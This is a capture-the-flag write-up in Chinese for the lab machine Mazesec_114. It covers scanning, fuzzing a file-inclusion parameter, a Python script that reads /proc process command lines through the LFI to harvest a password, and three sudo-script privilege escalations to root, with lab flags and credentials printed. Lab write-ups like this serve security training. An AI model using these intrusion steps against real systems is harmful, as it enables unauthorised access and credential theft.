Mazesec_114

靶机来源：QQ群-660930334

难度：Easy

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-19 14:21 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00059s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00038s latency).
MAC Address: 08:00:27:38:83:7B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.51
Host is up (0.00094s latency).
MAC Address: 08:00:27:C2:E0:E4 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 4.10 seconds

靶机IP：192.168.2.51

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.51                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-19 14:22 +0800
Nmap scan report for 192.168.2.51
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:C2:E0:E4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.89 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.51
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-19 14:22 +0800
Nmap scan report for 192.168.2.51
Host is up (0.00090s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Welcome
MAC Address: 08:00:27:C2:E0:E4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.30 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.51                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-19 14:23 +0800
Nmap scan report for 192.168.2.51
Host is up (0.0024s latency).
All 100 scanned ports on 192.168.2.51 are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 08:00:27:C2:E0:E4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 56.04 seconds

二、WEB渗透

1、80网站

访问80端口，没有什么信息

2、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.51 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.51
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              php,txt,html,bak,md,db,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 615]
file.php             (Status: 500) [Size: 0]
server-status        (Status: 403) [Size: 277]
Progress: 1764464 / 1764464 (100.00%)
===============================================================
Finished
===============================================================

发现存在一个文件file.php，但是返回的是500的状态码，考虑存在文件包含

3、ffuf

进行模糊测试

┌──(root㉿kali)-[~/miaosec]
└─# ffuf -u "http://192.168.2.51/file.php?FUZZ=/etc/passwd"  -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt  -fs 20  -ac

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.2.51/file.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 20
________________________________________________

file                    [Status: 200, Size: 1394, Words: 13, Lines: 27, Duration: 10ms]

存在file参数

4、文件包含LFI

尝试文件包含，读取/etc/passwd

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.51/file.php?file=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/ba

成功获取到用户名welcome

常规目录遍历没有读取到有用的信息，进行PID读取使用ai写一个扫描脚本

#!/usr/bin/env python3
import requests
import sys
import time
from urllib.parse import quote

# 配置目标 URL 模板（保留 {path} 占位符）
TARGET_URL = "http://192.168.2.51/file.php/?file={path}"

# 要探测的 PID 范围（可根据需要调整）
PID_MIN = 1
PID_MAX = 3000  # 一般系统活跃进程不会超过几千

# 超时设置（秒）
TIMEOUT = 5

# 编码路径以绕过简单过滤（可选）
def encode_path(path):
    # 双重编码或普通编码，根据目标情况调整
    return quote(path)  # 单层 URL 编码

def fetch_file(payload_path):
    """发送请求并返回响应内容（去除HTML标签等干扰）"""
    url = TARGET_URL.format(path=encode_path(payload_path))
    try:
        resp = requests.get(url, timeout=TIMEOUT)
        if resp.status_code == 200:
            return resp.text
        else:
            return None
    except Exception as e:
        print(f"[!] 请求失败: {e}")
        return None

def parse_cmdline(content):
    """解析 /proc/pid/cmdline（\x00 分隔）"""
    if not content:
        return ""
    return repr(content.replace('\x00', ' ').strip())

def parse_status(content):
    """提取 Name 和 PPid 等关键信息"""
    if not content:
        return {}
    info = {}
    for line in content.splitlines():
        if line.startswith(('Name:', 'Pid:', 'PPid:', 'Uid:')):
            key, val = line.split(':', 1)
            info[key.strip()] = val.strip()
    return info

def main():
    print(f"[*] 开始扫描 PID {PID_MIN} 到 {PID_MAX}...")
    found_pids = []

    for pid in range(PID_MIN, PID_MAX + 1):
        cmdline_path = f"../../../proc/{pid}/cmdline"
        status_path = f"../../../proc/{pid}/status"

        cmdline_raw = fetch_file(cmdline_path)
        status_raw = fetch_file(status_path)

        # 判断是否有效进程（只要有一个文件有内容即可）
        if cmdline_raw or status_raw:
            cmdline = parse_cmdline(cmdline_raw) if cmdline_raw else "(无 cmdline)"
            status_info = parse_status(status_raw) if status_raw else {}

            name = status_info.get('Name', 'Unknown')
            ppid = status_info.get('PPid', 'N/A')
            uid = status_info.get('Uid', 'N/A')

            print(f"[+] PID {pid}: Name={name}, CmdLine={cmdline}, PPid={ppid}, UID={uid}")
            found_pids.append(pid)

        # 可选：加延迟避免触发风控
        # time.sleep(0.05)

    print(f"\n[✓] 扫描完成，共发现 {len(found_pids)} 个有效进程。")
    if found_pids:
        print("发现的 PID 列表:", found_pids)

if __name__ == "__main__":
    main()

扫描结果

┌──(root㉿kali)-[~/miaosec]
└─# python3 lfi_proc_scan.py 
[*] 开始扫描 PID 1 到 3000...
[+] PID 1: Name=systemd, CmdLine='/sbin/init', PPid=0, UID=0    0       0       0
[+] PID 2: Name=kthreadd, CmdLine=(无 cmdline), PPid=0, UID=0   0       0       0
[+] PID 3: Name=rcu_gp, CmdLine=(无 cmdline), PPid=2, UID=0     0       0       0
[+] PID 4: Name=rcu_par_gp, CmdLine=(无 cmdline), PPid=2, UID=0 0       0       0
[+] PID 6: Name=kworker/0:0H-kblockd, CmdLine=(无 cmdline), PPid=2, UID=0       0       0       0
[+] PID 8: Name=mm_percpu_wq, CmdLine=(无 cmdline), PPid=2, UID=0       0       0       0
[+] PID 9: Name=ksoftirqd/0, CmdLine=(无 cmdline), PPid=2, UID=0        0       0       0
[+] PID 10: Name=rcu_sched, CmdLine=(无 cmdline), PPid=2, UID=0 0       0       0
[+] PID 11: Name=rcu_bh, CmdLine=(无 cmdline), PPid=2, UID=0    0       0       0
[+] PID 12: Name=migration/0, CmdLine=(无 cmdline), PPid=2, UID=0       0       0       0
[+] PID 14: Name=cpuhp/0, CmdLine=(无 cmdline), PPid=2, UID=0   0       0       0
[+] PID 15: Name=kdevtmpfs, CmdLine=(无 cmdline), PPid=2, UID=0 0       0       0
[+] PID 16: Name=netns, CmdLine=(无 cmdline), PPid=2, UID=0     0       0       0
[+] PID 17: Name=kauditd, CmdLine=(无 cmdline), PPid=2, UID=0   0       0       0
[+] PID 18: Name=khungtaskd, CmdLine=(无 cmdline), PPid=2, UID=0        0       0       0
[+] PID 19: Name=oom_reaper, CmdLine=(无 cmdline), PPid=2, UID=0        0       0       0
[+] PID 20: Name=writeback, CmdLine=(无 cmdline), PPid=2, UID=0 0       0       0
[+] PID 21: Name=kcompactd0, CmdLine=(无 cmdline), PPid=2, UID=0        0       0       0
[+] PID 22: Name=ksmd, CmdLine=(无 cmdline), PPid=2, UID=0      0       0       0
[+] PID 23: Name=khugepaged, CmdLine=(无 cmdline), PPid=2, UID=0        0       0       0
[+] PID 24: Name=crypto, CmdLine=(无 cmdline), PPid=2, UID=0    0       0       0
[+] PID 25: Name=kintegrityd, CmdLine=(无 cmdline), PPid=2, UID=0       0       0       0
[+] PID 26: Name=kblockd, CmdLine=(无 cmdline), PPid=2, UID=0   0       0       0
[+] PID 27: Name=edac-poller, CmdLine=(无 cmdline), PPid=2, UID=0       0       0       0
[+] PID 28: Name=devfreq_wq, CmdLine=(无 cmdline), PPid=2, UID=0        0       0       0
[+] PID 29: Name=watchdogd, CmdLine=(无 cmdline), PPid=2, UID=0 0       0       0
[+] PID 32: Name=kswapd0, CmdLine=(无 cmdline), PPid=2, UID=0   0       0       0
[+] PID 50: Name=kthrotld, CmdLine=(无 cmdline), PPid=2, UID=0  0       0       0
[+] PID 51: Name=ipv6_addrconf, CmdLine=(无 cmdline), PPid=2, UID=0     0       0       0
[+] PID 61: Name=kstrp, CmdLine=(无 cmdline), PPid=2, UID=0     0       0       0
[+] PID 112: Name=ata_sff, CmdLine=(无 cmdline), PPid=2, UID=0  0       0       0
[+] PID 114: Name=scsi_eh_0, CmdLine=(无 cmdline), PPid=2, UID=0        0       0       0
[+] PID 116: Name=scsi_tmf_0, CmdLine=(无 cmdline), PPid=2, UID=0       0       0       0
[+] PID 118: Name=scsi_eh_1, CmdLine=(无 cmdline), PPid=2, UID=0        0       0       0
[+] PID 119: Name=scsi_tmf_1, CmdLine=(无 cmdline), PPid=2, UID=0       0       0       0
[+] PID 121: Name=scsi_eh_2, CmdLine=(无 cmdline), PPid=2, UID=0        0       0       0
[+] PID 124: Name=scsi_tmf_2, CmdLine=(无 cmdline), PPid=2, UID=0       0       0       0
[+] PID 125: Name=kworker/u2:3-flush-8:0, CmdLine=(无 cmdline), PPid=2, UID=0   0       0       0
[+] PID 160: Name=kworker/0:1H-kblockd, CmdLine=(无 cmdline), PPid=2, UID=0     0       0       0
[+] PID 190: Name=kworker/u3:0, CmdLine=(无 cmdline), PPid=2, UID=0     0       0       0
[+] PID 192: Name=jbd2/sda1-8, CmdLine=(无 cmdline), PPid=2, UID=0      0       0       0
[+] PID 193: Name=ext4-rsv-conver, CmdLine=(无 cmdline), PPid=2, UID=0  0       0       0
[+] PID 227: Name=systemd-journal, CmdLine='/lib/systemd/systemd-journald', PPid=1, UID=0       0       0       0
[+] PID 248: Name=systemd-udevd, CmdLine='/lib/systemd/systemd-udevd', PPid=1, UID=0    0       0       0
[+] PID 299: Name=ttm_swap, CmdLine=(无 cmdline), PPid=2, UID=0 0       0       0
[+] PID 300: Name=irq/18-vmwgfx, CmdLine=(无 cmdline), PPid=2, UID=0    0       0       0
[+] PID 317: Name=dhclient, CmdLine='/sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3', PPid=1, UID=0       0       0       0
[+] PID 385: Name=systemd-timesyn, CmdLine='/lib/systemd/systemd-timesyncd', PPid=1, UID=101    101     101     101
[+] PID 388: Name=sd-resolve, CmdLine='/lib/systemd/systemd-timesyncd', PPid=1, UID=101 101     101     101
[+] PID 389: Name=cron, CmdLine='/usr/sbin/cron -f', PPid=1, UID=0      0       0       0
[+] PID 390: Name=dbus-daemon, CmdLine='/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only', PPid=1, UID=104      104     104 104
[+] PID 393: Name=sleep, CmdLine='service --user welcome --password 6WXqj9Vc2tdXQ3TN0z54 --host localhost --port 8080 infinity', PPid=1, UID=65534      65534   65534   65534
[+] PID 394: Name=rsyslogd, CmdLine='/usr/sbin/rsyslogd -n -iNONE', PPid=1, UID=0       0       0       0
[+] PID 403: Name=systemd-logind, CmdLine='/lib/systemd/systemd-logind', PPid=1, UID=0  0       0       0
[+] PID 407: Name=agetty, CmdLine='/sbin/agetty -o -p -- \\u --noclear tty1 linux', PPid=1, UID=0       0       0       0
[+] PID 408: Name=in:imuxsock, CmdLine='/usr/sbin/rsyslogd -n -iNONE', PPid=1, UID=0    0       0       0
[+] PID 409: Name=in:imklog, CmdLine='/usr/sbin/rsyslogd -n -iNONE', PPid=1, UID=0      0       0       0
[+] PID 410: Name=rs:main Q:Reg, CmdLine='/usr/sbin/rsyslogd -n -iNONE', PPid=1, UID=0  0       0       0
[+] PID 411: Name=sshd, CmdLine='sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups', PPid=1, UID=0        0       0       0
[+] PID 425: Name=unattended-upgr, CmdLine='/usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal', PPid=1, UID=0       0       0       0
[+] PID 426: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=1, UID=0  0       0       0
[+] PID 463: Name=gmain, CmdLine='/usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal', PPid=1, UID=0 0       0       0
[+] PID 581: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33       33      33      33
[+] PID 589: Name=kworker/0:1-events, CmdLine=(无 cmdline), PPid=2, UID=0       0       0       0
[+] PID 712: Name=kworker/u2:0-flush-8:0, CmdLine=(无 cmdline), PPid=2, UID=0   0       0       0
[+] PID 779: Name=kworker/0:2-ata_sff, CmdLine=(无 cmdline), PPid=2, UID=0      0       0       0
[+] PID 780: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33       33      33      33
[+] PID 783: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33       33      33      33
[+] PID 798: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33       33      33      33
[+] PID 802: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33       33      33      33
[+] PID 804: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33       33      33      33
[+] PID 814: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33       33      33      33
[+] PID 819: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33       33      33      33
[+] PID 822: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33       33      33      33
[+] PID 830: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33       33      33      33
[+] PID 848: Name=kworker/0:0-ata_sff, CmdLine=(无 cmdline), PPid=2, UID=0      0       0       0

[✓] 扫描完成，共发现 76 个有效进程。
发现的 PID 列表: [1, 2, 3, 4, 6, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 32, 50, 51, 61, 112, 114, 116, 118, 119, 121, 124, 125, 160, 190, 192, 193, 227, 248, 299, 300, 317, 385, 388, 389, 390, 393, 394, 403, 407, 408, 409, 410, 411, 425, 426, 463, 581, 589, 712, 779, 780, 783, 798, 802, 804, 814, 819, 822, 830, 848]

成功找到用户welcome的密码6WXqj9Vc2tdXQ3TN0z54

1	`[+] PID 393: Name=sleep, CmdLine='service --user welcome --password 6WXqj9Vc2tdXQ3TN0z54 --host localhost --port 8080 infinity', PPid=1, UID=65534 65534 65534 65534`

三、获取welcome权限

使用凭证进行登录

┌──(root㉿kali)-[~/miaosec]
└─# ssh welcome@192.168.2.51
welcome@114:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)

四、权限提升

查看sudo -l

welcome@114:~$ sudo -l
Matching Defaults entries for welcome on 114:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on 114:
    (ALL) NOPASSWD: /opt/read.sh
    (ALL) NOPASSWD: /opt/short.sh

查看/read.sh

welcome@114:~$ cat /opt/read.sh 
#!/bin/bash

echo "Input the flag:"
if head -1 | grep -q "$(< /root/root.txt)"
then
        echo "Y"
else
        echo "N"
fi

查看/short.sh

welcome@114:~$ cat /opt/short.sh 
#!/bin/bash

PATH=/usr/bin
My_guess=$RANDOM

echo "This is script logic"
cat << EOF
if [ "$1" != "$My_guess" ] ;then
    echo "Nop"; 
else
    bash -i;
fi
EOF

[ "$1" != "$My_guess" ] && echo "Nop" || bash -i

方案一：通过short.sh

脚本逻辑是随机数生成：My_guess=$RANDOM。在 Bash 中，$RANDOM 生成一个 0 到 32767 之间的整数。当输入的数等于他那个随机数，就会进入shell循环脚本

1	`while true; do sudo /opt/short.sh 1024; done`

等待执行完成后，自动跳转到root-shell

....
This is script logic
if [ "1024" != "20138" ] ;then
    echo "Nop"; 
else
    bash -i;
fi
Nop
This is script logic
if [ "1024" != "1024" ] ;then
    echo "Nop"; 
else
    bash -i;
fi
root@114:/home/welcome# id
uid=0(root) gid=0(root) groups=0(root)

方案二：通过read.sh

利用进程监控泄露敏感信息获取 Flag

当我们运行read.sh的时候会创建进程，并读取/root/root.txt放到进程里面，我们运行脚本后不关闭，然后去查看进程。

welcome@114:~$ sudo /opt/read.sh
Input the flag:
welcome@114:~$ ps -aux | grep grep
root        4958  0.0  0.0   6320   636 pts/0    S+   23:33   0:00 grep -q flag{root-c3dbe270140775bb9fc6eaa2559f914f}
welcome     4961  0.0  0.0   6176   696 pts/1    S+   23:33   0:00 grep grep

方案三：>&-

1	`sudo /opt/short.sh '1' >&-`

核心在于末尾的 >&- 。在 Linux Shell 中， >&- 的意思是关闭标准输出 (Close Standard Output / STDOUT)。

1	`[ "$1" != "$My_guess" ] && echo "Nop" \|\| bash -i`

当echo "Nop"执行失败后，才会跳转到bash -i

由于此时标准输出（STDOUT）已经被关闭了，因此echo无法写入东西，echo就会报错，因此会跳转执行bash -i

welcome@114:~$ sudo /opt/short.sh '1' >&-
/opt/short.sh: line 6: echo: write error: Bad file descriptor
cat: write error: Bad file descriptor
/opt/short.sh: line 15: echo: write error: Bad file descriptor

标准输出关掉了，需要恢复完整shell

1
2
3

root@114:/home/welcome# id
id: write error: Bad file descriptor
root@114:/home/welcome# /bin/bash -i >&2 2>&2

获取到root权限

1 2	`root@114:/home/welcome# id uid=0(root) gid=0(root) groups=0(root)`

五、查看FLAG

1
2
3

root@114:/home/welcome# cat /root/root.txt /home/welcome/user.txt 
flag{root-c3dbe270140775bb9fc6eaa2559f914f}
flag{user-210f652e7e3b7e7359e523ef04e96295}

Maze-sec

#文件包含LFI #FUZZ #PID

Mazesec_114

http://miao-sec.github.io/Maze-sec/Mazesec_114/

作者

Miao

发布于

2026年1月19日

许可协议

BY-MIAO

Mazesec_Guoqing 上一篇

Mazesec_113 下一篇